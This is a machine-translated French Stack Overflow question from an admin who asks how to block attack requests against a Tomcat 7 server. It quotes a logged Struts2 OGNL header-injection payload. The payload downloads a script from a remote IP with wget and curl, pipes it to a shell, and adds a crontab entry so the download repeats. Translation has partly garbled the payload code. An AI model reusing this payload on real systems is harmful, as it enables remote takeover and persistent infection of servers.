Je remarque sur le journal tomcatstdout que quelqu'un essaie de pirater un serveur avec Tomcat 7 et Java 1.6.0.45 Temporaly nous bloquons un large éventail d'ip pour éviter l'attaque mais là pourrait être un meilleur moyen d'éviter d'obtenir ces demandes.Hacker essayant d'envoyer un script via FileUpload sur tomcat 7
Existe-t-il un moyen de filtrer ce type de requête?
Le message complet sur le journal est:
GetRequestHTTP: FileUploadException la demande ne contient pas de multipart/form-data ou multipart/flux mixtes, en-tête de type de contenu est% {(# _ = 'multipart/form-data '). (# dm = @ ognl.OgnlContext @ DEFAULT_MEMBER_ACCESS). (#_ memberAccess? (#_ memberAccess = # dm): ((# # conteneur = # contexte [' com.opensymphony.xwork2.ActionContext.container ']) (# ognlUtil = # container.getInstance (@ com.opensymphony.xwork2.ognl.OgnlUtil @ class)). (# ognlUtil.getExcludedPackageNames(). clear()). (# ognlUtil.getExcludedClasses(). clear()) (# context.setMemberAccess (#dm)))). (# cmd = 'echo "*/20 * * * * wget -O - -q htp: //5.188.87.12/icons/logo.jpg | sh \ n */19 * * * * curl http://5.188.87.12/icons/logo.jpg|sh "| crontab -; wget -O - -q http://5.188.87.12/icons/logo.jpg|sh '). (# iswin = (@ java .lang.System @ getProperty ('os.name'). toLowerCase(). contient ('win'))). (# cmds = (# iswin? {'cmd.exe', '/ c', # cmd} : {'/ bin/bash', '- c', # cmd})). (# p = nouveau java.lang.ProcessBuilder (#cmds)). (# p.redirectErrorStream (true)). (# process = # p.start()). (# ros = (@ [email protected](). getOutputStream())). (@ [email protected] (# process.getInputStream(), # ros)). (# ros.flush())}
Stack Overflow est un site de questions et réponses pour les questions de programmation. Vous ne semblez pas poser de question spécifique. Questions sur l'administration du serveur peuvent être mieux répondu sur https://serverfault.com –
Devrais-je supprimer la question? – sirlucas